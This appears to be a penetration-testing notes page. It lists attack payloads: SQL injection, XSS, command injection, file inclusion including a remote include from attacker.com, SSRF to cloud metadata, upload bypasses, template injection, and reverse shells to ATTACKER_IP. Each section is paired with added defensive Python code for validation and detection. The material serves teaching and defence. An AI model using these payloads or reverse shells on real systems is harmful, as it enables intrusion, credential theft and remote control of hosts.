Exploitation Techniques

A curated collection of payloads, commands, and notes from my pentesting journey.

SQLi | Web

SQL Injection — Login Bypass

Classic SQLi payloads for authentication bypass and timing tests.

' OR '1'='1'--
admin' AND SLEEP(5)--
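As an added illustration (not part of the original notes), the following Python shows why the first payload above works against a login that splices input into the SQL text, and why the same input is harmless once the query is parameterized. The in-memory SQLite table and the credentials are constructed for the demo; the second payload uses MySQL's SLEEP() and is not exercised here because SQLite has no such function.

```python
import sqlite3

BYPASS_PAYLOAD = "' OR '1'='1'--"   # the first payload from the notes above


def make_demo_db() -> sqlite3.Connection:
    # Constructed in-memory user table for the demonstration (not from the page).
    # Real systems store password hashes; plaintext is used only to keep the query short.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Input becomes part of the SQL text: the quote closes the literal, OR '1'='1'
    # makes the WHERE clause true for every row, and '--' comments out the
    # password comparison entirely.
    query = (
        "SELECT 1 FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders bind the input as values. The SQL grammar is fixed before any
    # user data is seen, so the payload is just an unusual username that matches nobody.
    query = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable, bypass payload:   ", login_vulnerable(db, BYPASS_PAYLOAD, "wrong"))
    print("parameterized, bypass payload:", login_safe(db, BYPASS_PAYLOAD, "wrong"))
    print("parameterized, real password: ", login_safe(db, "admin", "correct-horse-battery"))
```

Run it and the vulnerable function returns True for the payload with a wrong password, while the parameterized one returns True only for the real credentials.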
XSS | Web

Cross-Site Scripting — Quick Test

Payloads to detect unsanitized input or HTML context injection.

<script>alert(1)</script>
<img src=x onerror=alert(1)>
"><svg/onload=alert(1)>
Command Injection | OS

Command Injection — Linux

Basic separators to test OS command execution through parameters.

;id
|whoami
&&uname -a
`cat /etc/passwd`
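Added example (not from the original notes) showing both the detection and the fix for the separators above. The detector scans constructed access-log lines for those separators in URL-decoded query values; the fix validates the parameter against a strict hostname grammar and passes it as an argv element so that no shell ever parses it. The `/ping?host=` endpoint, the log lines and the client addresses are all constructed for the demo.

```python
import re
import subprocess
import sys
from urllib.parse import parse_qsl, unquote, urlsplit

# The separators and substitution syntax listed above, as one detection pattern.
SHELL_META = re.compile(r";|\|{1,2}|&&|`|\$\(")
# Strict hostname grammar: anything outside it is refused before any command runs.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$",
    re.IGNORECASE,
)

# Constructed access-log lines (not from the page): one benign request, four probes.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /ping?host=example.com HTTP/1.1" 200 120',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /ping?host=example.com%3Bid HTTP/1.1" 200 310',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /ping?host=x%7Cwhoami HTTP/1.1" 200 290',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /ping?host=x%26%26uname%20-a HTTP/1.1" 200 350',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /ping?host=%60cat%20/etc/passwd%60 HTTP/1.1" 200 900',
]


def is_valid_hostname(value: str) -> bool:
    return HOSTNAME.fullmatch(value) is not None


def flag_shell_metachars(log_lines):
    """Return (client_ip, param, decoded_value) for query values carrying shell separators."""
    hits = []
    for line in log_lines:
        m = re.search(r'^(\S+) .*"(?:GET|POST) (\S+) HTTP', line)
        if not m:
            continue
        client, target = m.groups()
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            decoded = unquote(value)   # second decode also catches double-encoded values
            if SHELL_META.search(decoded):
                hits.append((client, key, decoded))
    return hits


def echo_argument(value: str) -> str:
    # argv-list execution: no shell parses the string, so ';', '|' and backticks
    # are ordinary characters inside argv[1]. The child is the Python interpreter
    # because it is always present; /bin/echo would behave the same way.
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", value],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout


def ping_host(host: str) -> list:
    # Validate first, then build argv. Returns the argv that would be executed
    # (ping itself may be absent or sandboxed where this runs).
    if not is_valid_hostname(host):
        raise ValueError("refusing hostname: " + repr(host))
    return ["ping", "-c", "1", host]
```

The two layers are independent: the allowlist grammar rejects the probe at the edge, and the argv form means that even a value which slips through validation can never become a second command.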
LFI/RFI | PHP

Local & Remote File Inclusion

Traversal and remote file inclusion vectors.

?file=../../../../etc/passwd
?page=php://filter/convert.base64-encode/resource=index.php
?page=http://attacker.com/shell.txt
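Added example (not from the original notes): a page-include resolver in Python that rejects all three vectors above. It refuses anything carrying a scheme (the php:// stream wrapper and the remote http:// include), refuses null bytes, resolves the joined path and checks that the result is still inside the page root, and finally applies a suffix allowlist. The temporary `pages/` directory and `home.html` are constructed for the demo.

```python
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

ALLOWED_SUFFIXES = {".html", ".txt"}


def make_demo_root() -> Path:
    # Constructed page directory for the demonstration (not from the page).
    root = Path(tempfile.mkdtemp()) / "pages"
    root.mkdir()
    (root / "home.html").write_text("<h1>home</h1>")
    return root


def resolve_include(root: Path, requested: str) -> Path:
    """Map a user-supplied page name to a file strictly inside root, or raise ValueError."""
    # 1. Anything with a scheme is a stream wrapper (php://filter) or a remote
    #    include (http://), never a file under root.
    if urlsplit(requested).scheme or "://" in requested:
        raise ValueError("scheme not allowed")
    # 2. A null byte truncates the name in C-backed runtimes, defeating suffix checks.
    if "\x00" in requested:
        raise ValueError("null byte")
    root_abs = root.resolve()
    # 3. Join, then resolve: '..' segments and symlinks collapse before the
    #    containment test. pathlib drops root entirely when the requested path
    #    is absolute ('/etc/passwd'), which the same test also catches.
    candidate = (root_abs / requested).resolve()
    if candidate != root_abs and root_abs not in candidate.parents:
        raise ValueError("outside root")
    # 4. Only allowlisted file types are includable.
    if candidate.suffix not in ALLOWED_SUFFIXES:
        raise ValueError("suffix not allowed")
    if not candidate.is_file():
        raise FileNotFoundError(requested)
    return candidate


def classify_include(root: Path, requested: str) -> str:
    try:
        resolve_include(root, requested)
        return "allowed"
    except ValueError as exc:
        return "rejected: " + str(exc)
    except FileNotFoundError:
        return "rejected: no such page"
```

Order matters: the scheme and null-byte checks run before the path is touched, and containment is tested on the resolved path rather than on the raw string, so encoded or doubled `../` sequences cannot slip past a prefix comparison.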
SSRF | Web

Server-Side Request Forgery (SSRF)

Exploiting server-side fetch functionality to access internal or restricted resources. Try these payloads in lab environments only.

# Example target with user-supplied URL
?url=http://127.0.0.1:80/
?endpoint=http://169.254.169.254/latest/meta-data/
?file=http://YOUR_SERVER_IP:8080/test

# Path traversal bypass for denylist (as in /private bypass)
?avatar=x/../private

Detection: Look for OOB callbacks, time delays, or responses containing internal data.
Mitigation: Whitelist destinations, validate normalized URLs, restrict server egress.
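Added example (not from the original notes) implementing the mitigation line above in Python: an outbound-URL check that allows only http/https to an allowlist of hostnames, rejects literal loopback, link-local (the 169.254.169.254 metadata address) and private addresses including their IPv4-mapped IPv6 forms, and a path check that normalizes before comparing with a denylist, which is the difference the `x/../private` payload exploits. The allowlisted hostnames and the `/private` prefix are constructed for the demo.

```python
import ipaddress
import posixpath
from urllib.parse import urlsplit

# Constructed allowlist for the demonstration (not from the page).
ALLOWED_HOSTS = {"images.example.com", "cdn.example.com"}


def check_outbound_url(url: str, allowed_hosts=ALLOWED_HOSTS) -> str:
    """Decide whether the server may fetch url. Returns 'allowed' or 'rejected: <reason>'."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return "rejected: scheme"                # no file://, gopher://, dict:// ...
    if parts.username is not None or parts.password is not None:
        return "rejected: userinfo"              # http://allowed-name@internal-host/ tricks
    host = parts.hostname
    if not host:
        return "rejected: no host"
    try:
        port = parts.port
    except ValueError:
        return "rejected: malformed port"
    if port not in (None, 80, 443):
        return "rejected: port"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None                                # a name, not a literal address
    if ip is not None:
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped                  # [::ffff:127.0.0.1] is still loopback
        if (ip.is_loopback or ip.is_link_local or ip.is_private
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified):
            return "rejected: internal address"  # 127.0.0.1, 169.254.169.254, 10/8 ...
        return "rejected: literal IP"            # the allowlist is by name only
    if host.lower().rstrip(".") not in allowed_hosts:
        return "rejected: host not allowlisted"
    return "allowed"


def naive_path_check(user_path: str) -> str:
    # The kind of denylist the 'x/../private' payload is aimed at: comparing the
    # raw string lets a traversal segment walk past the check.
    return "denied" if user_path.startswith("private") else "allowed"


def normalized_path_check(user_path: str) -> str:
    # Normalize first ('x/../private' collapses to '/private'), then compare.
    norm = posixpath.normpath("/" + user_path)
    return "denied" if norm == "/private" or norm.startswith("/private/") else "allowed"
```

A name allowlist alone does not close DNS rebinding or redirect-based tricks: resolve the name, apply the same address checks to what it resolves to, connect to that address, and disable redirects on the fetch. The egress restriction in the mitigation line is the backstop when the application check is bypassed.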

File Upload | Web

File Upload Bypass Tricks

Common filename & MIME bypass patterns.

shell.php;.jpg
shell.pHp
shell.php%00.jpg
Content-Type: image/jpeg → embed PHP payload
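Added example (not from the original notes): an upload validator in Python that rejects each of the four tricks above. It decodes the name once, refuses null bytes, lowercases and restricts the basename to a single short extension (so `shell.php;.jpg` and `shell.pHp` fail), ignores the client's Content-Type entirely and instead checks the file's magic bytes against the extension, and stores the file under a server-generated name. The sample JPEG header and the filenames are constructed for the demo.

```python
import os
import re
import uuid
from urllib.parse import unquote

# Allowed extensions with the magic bytes each file type must start with.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# One stem, one dot, one short lowercase extension: 'shell.php;.jpg' and
# 'shell.php.jpg' both fail this pattern.
SAFE_BASENAME = re.compile(r"^[a-z0-9_-]{1,64}\.[a-z0-9]{2,4}$")
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")

# Constructed minimal JPEG header used as the 'real image' sample (not from the page).
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"


def validate_upload(filename: str, content: bytes, declared_type: str = "") -> str:
    """Return 'accepted' or 'rejected: <reason>'. declared_type is deliberately ignored:
    the Content-Type header is attacker-controlled, so the content is inspected instead."""
    name = unquote(filename)                    # one decode, as the framework applies
    if "\x00" in name:
        return "rejected: null byte"            # the %00 trick relies on C-string truncation
    base = os.path.basename(name).lower()       # strips directories, folds 'pHp' to 'php'
    if not SAFE_BASENAME.fullmatch(base):
        return "rejected: filename pattern"
    ext = os.path.splitext(base)[1]
    if ext not in MAGIC:
        return "rejected: extension"
    if not any(content.startswith(magic) for magic in MAGIC[ext]):
        return "rejected: content does not match extension"
    if any(marker in content for marker in SCRIPT_MARKERS):
        return "rejected: script markers in image"   # polyglot heuristic, not a parser
    return "accepted"


def storage_name(filename: str) -> str:
    # Call only after validate_upload() returned 'accepted'. A server-generated
    # name with the verified extension takes filename tricks out of the picture.
    ext = os.path.splitext(unquote(filename).lower())[1]
    return uuid.uuid4().hex + ext
```

Serve the stored files from a location where the web server does not execute scripts (a separate host or bucket is best); re-encoding images through an image library is the stronger alternative to the marker heuristic.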
SSTI | Web

Server-Side Template Injection

Detection payloads for templating engine evaluation.

{{7*7}}
${7*7}
<%= 7*7 %>
Reverse Shell | Bash

Reverse Shell (Linux)

Common payloads for lab testing. Replace ATTACKER_IP and PORT.

bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
nc -e /bin/bash ATTACKER_IP 4444
php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
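Added example (not from the original notes): the detection side of the three payloads above. Each one leaves a recognizable command line, so the Python below turns them into three rules (bash's /dev/tcp pseudo-device, netcat with -e, and fsockopen followed by exec) and runs them over constructed process-execution events. The event format, hostnames and the 203.0.113.10 address are all constructed for the demo.

```python
import re

# Patterns derived from the three payloads above.
REVERSE_SHELL_RULES = {
    "bash_dev_tcp": re.compile(r"/dev/(tcp|udp)/\S+/\d+"),
    "netcat_exec": re.compile(r"\b(nc|ncat|netcat)\b.*\s-[a-zA-Z]*e\s"),
    "php_fsockopen_shell": re.compile(r"fsockopen\(.*\).*(exec|system|passthru|popen)\("),
}

# Constructed process-execution events (not from the page); cmd= is the last field.
SAMPLE_EVENTS = [
    "2024-01-01T10:00:00Z host1 execve uid=33 cmd=bash -i >& /dev/tcp/203.0.113.10/4444 0>&1",
    "2024-01-01T10:00:05Z host1 execve uid=33 cmd=nc -e /bin/bash 203.0.113.10 4444",
    '2024-01-01T10:00:09Z host1 execve uid=33 cmd=php -r $sock=fsockopen("203.0.113.10",4444);exec("/bin/sh -i <&3 >&3 2>&3");',
    "2024-01-01T10:01:00Z host1 execve uid=1000 cmd=nc -zv db.internal 5432",
    "2024-01-01T10:02:00Z host1 execve uid=1000 cmd=bash -c ls /dev/tcp",
]


def match_reverse_shell(cmdline: str):
    """Names of the rules that fire on one command line (empty list if none)."""
    return [name for name, rule in REVERSE_SHELL_RULES.items() if rule.search(cmdline)]


def scan_events(events):
    """Return (timestamp, uid, rule_names) for each event matching at least one rule."""
    findings = []
    for line in events:
        m = re.match(r"(\S+) \S+ execve uid=(\d+) cmd=(.*)$", line)
        if not m:
            continue
        ts, uid, cmd = m.groups()
        names = match_reverse_shell(cmd)
        if names:
            findings.append((ts, int(uid), names))
    return findings
```

The two benign events (a port check with `nc -zv` and a harmless `ls`) show the rules are narrower than "mentions nc" or "mentions /dev/tcp". String rules only catch the plain forms; the stronger signal is a shell process whose stdin and stdout are a network socket, which process telemetry (auditd, eBPF-based sensors) can report, correlated with egress to an unusual port. The uid 33 in the samples is the web-server account, where an interactive shell has no business running at all.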